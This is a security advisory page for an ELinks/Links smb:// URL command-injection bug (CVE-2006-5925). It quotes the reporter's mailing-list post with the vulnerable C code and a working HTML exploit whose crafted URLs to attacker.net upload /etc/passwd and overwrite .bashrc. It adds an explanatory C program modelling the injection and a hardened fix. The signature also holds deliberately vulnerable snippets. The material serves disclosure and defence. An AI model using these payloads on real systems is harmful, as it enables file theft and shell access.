SecurityTracker.com
SecurityTracker
Archives

Category:   Application (Web Browser)  >   ELinks Vendors:   elinks.or.cz
ELinks SMB URL Parsing Bug Lets Remote Users Upload/Download Files
SecurityTracker Alert ID:  1017232
SecurityTracker URL:  http://securitytracker.com/id/1017232
CVE Reference:   CVE-2006-5925   (Links to External Site)
Date:  Nov 15 2006
Impact:   Disclosure of system information, Disclosure of user information, Modification of user information
Exploit Included:  Yes  
Version(s): 0.11.1
Description:   A vulnerability was reported in ELinks. A remote user can cause arbitrary smbclient commands to be executed on the target user's system.

The smb:// protocol handler builds the command string passed to 'smbclient -c' from the directory part of the URL without escaping or validating it. A double quote in a crafted URL closes the file name of the intended 'get' command, and semicolons append further smbclient commands (such as lcd, put and get), which then run with the privileges of the user running ELinks. A remote user can create HTML containing such a URL that, when loaded by the target user on a system where smbclient is installed, will upload files from or write files to the target user's system.

Some demonstration exploit URLs are provided:

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit;

smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit;

Teemu Salmela reported this vulnerability.

Impact:   A remote user can obtain files from or create files on the target user's system.
Solution:   No upstream solution was available at the time of this entry.
Vendor URL:  elinks.or.cz/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Nov 15 2006 (Red Hat Issues Fix) ELinks SMB URL Parsing Bug Lets Remote Users Upload/Download Files
Red Hat has released a fix for Red Hat Enterprise Linux 4.



Source Message Contents

Subject:  [Full-disclosure] Links smbclient command execution


Links smbclient command execution
-----------------------------------------------------------------------------
There is a flaw in the Links web browser that allows malicious web sites to
execute smbclient commands on the victim's machine. This flaw makes it
possible to read any file from the victim system (any file that the user
running links has read access to), or to upload any file to the victim system
(any file that the user running links can create/overwrite).  The attacker
could, for example, upload ~/.bashrc to gain shell access.

Version numbers:
-----------------------------------------------------------------------------
I tested this on Ubuntu 6.06 LTS and Links 1.00pre12. Smbclient must also
be installed.

Vulnerable code:
-----------------------------------------------------------------------------
smb_func() in smb.c:
    ...
    if (*share) {
        if (!*dir || dir[strlen(dir) - 1] == '/' || dir[strlen(dir) - 1] == '\\') {
            if (dir) {
                v[n++] = "-D";
                v[n++] = dir;
            }
            v[n++] = "-c";
            v[n++] = "ls";
        } else {
            unsigned char *ss;
            unsigned char *s = stracpy("get \"");
'dir' is the directory part of the smb://.. url:
            add_to_strn(&s, dir);
            add_to_strn(&s, "\" -");
            while ((ss = strchr(s, '/'))) *ss = '\\';
            v[n++] = "-c";
            v[n++] = s;
        }
    }
    v[n++] = NULL;
smbclient is executed:
    execvp("smbclient", (char **)v);
    fprintf(stderr, "smbclient not found in $PATH");
    _exit(1);
    ...

Exploit:
-----------------------------------------------------------------------------
<html>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; '>Put /etc/passwd</a>
<a href='smb://attacker.net/work/XXX" YYY; lcd ..; lcd ..; lcd ..; lcd home; lcd teemu; get HOHO .bashrc; exit; '>Get .bashrc</a>
</html>

-- 
fscanf(socket,"%s",buf); printf(buf);
sprintf(query, "SELECT %s FROM table", buf);
sprintf(cmd, "echo %s | sqlquery", query); system(cmd);
Teemu Salmela 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
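The following C program is an added illustration written for this page; it is not ELinks code, not the reporter's code and not the upstream fix. It reconstructs how the smb_func() fragment quoted in the message above pastes the directory part of an smb:// URL into the string handed to 'smbclient -c', models the way smbclient's command loop consumes that string (it splits on ';' first and only then tokenises each command, which is why a ';' inside the "quoted" file name still starts a new command), and adds a hardened builder that refuses the metacharacters the advisory's demonstration URLs depend on. The function names, the rejection rule in build_get_command_safe() and the sample inputs are this example's own assumptions; the first sample input is the directory part of the advisory's first demonstration URL (everything after the "work" share).

```c
/* Added example for this page (not ELinks code, not the upstream fix).
 * Reconstructs the vulnerable smb_func() construction, models smbclient's
 * -c command splitting, and shows a hardened builder as an assumption. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_CMDS 16

/* Vulnerable construction as quoted from ELinks: get "<dir>" - with every
 * '/' turned into '\'. The URL's directory part is pasted in unescaped.
 * Returns a malloc'd string the caller frees. */
char *build_get_command_vuln(const char *dir)
{
    size_t n = strlen(dir) + sizeof("get \"\" -");
    char *s = malloc(n);
    if (!s) return NULL;
    snprintf(s, n, "get \"%s\" -", dir);
    for (char *p = s; *p; p++)
        if (*p == '/') *p = '\\';
    return s;
}

/* Hardened builder (this example's assumption, not the upstream fix): a
 * remote path taken from a URL has no legitimate use for '"', ';' or
 * control characters, so refuse them outright instead of trying to quote.
 * Returns NULL when the directory part is rejected. */
char *build_get_command_safe(const char *dir)
{
    for (const char *p = dir; *p; p++)
        if (*p == '"' || *p == ';' || (unsigned char)*p < 0x20)
            return NULL;
    return build_get_command_vuln(dir);
}

/* Model of smbclient's -c handling: the string is split on ';' before each
 * piece is tokenised, so quotes do not protect a ';'. Stores the verb
 * (first word) of each command in verbs[] as malloc'd strings and returns
 * how many commands were found. */
int split_commands(const char *cmdline, char *verbs[], int max)
{
    int count = 0;
    const char *p = cmdline;
    while (*p && count < max) {
        while (*p == ' ') p++;                      /* skip leading blanks */
        const char *end = strchr(p, ';');
        if (!end) end = p + strlen(p);
        const char *q = p;
        while (q < end && *q != ' ') q++;           /* verb = first word */
        if (q > p) {
            size_t len = (size_t)(q - p);
            verbs[count] = malloc(len + 1);
            if (!verbs[count]) break;
            memcpy(verbs[count], p, len);
            verbs[count][len] = '\0';
            count++;
        }
        p = *end ? end + 1 : end;
    }
    return count;
}

/* Number of commands smbclient would execute for this directory part when
 * built the vulnerable way; a benign path yields exactly one ("get"). */
int dir_command_count(const char *dir)
{
    char *verbs[MAX_CMDS];
    char *cmd = build_get_command_vuln(dir);
    if (!cmd) return -1;
    int n = split_commands(cmd, verbs, MAX_CMDS);
    for (int i = 0; i < n; i++) free(verbs[i]);
    free(cmd);
    return n;
}

/* 1 if the hardened builder accepts this directory part, 0 if it refuses. */
int dir_accepted_safe(const char *dir)
{
    char *cmd = build_get_command_safe(dir);
    if (!cmd) return 0;
    free(cmd);
    return 1;
}

int main(void)
{
    /* Constructed inputs: the advisory's first crafted directory part and a benign path. */
    const char *evil = "XXX\" YYY; lcd ..; lcd ..; lcd ..; lcd etc; put passwd ; exit; ";
    const char *benign = "work/report.txt";
    char *cmd = build_get_command_vuln(evil);

    printf("argv for -c: %s\n", cmd);
    printf("commands smbclient would run: %d (benign path: %d)\n",
           dir_command_count(evil), dir_command_count(benign));
    printf("hardened builder accepts crafted dir: %d, benign dir: %d\n",
           dir_accepted_safe(evil), dir_accepted_safe(benign));
    free(cmd);
    return 0;
}
```

Note that execvp() with an argv array never invokes a shell, so the injection needs no shell metacharacters at all: the '-c' argument is a command language of its own, and that is where the unescaped URL data is interpreted. The '-D dir' branch of the same function passes the directory as a separate argv element rather than inside a command string and is not affected in the same way.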

Copyright 2019, SecurityGlobal.net LLC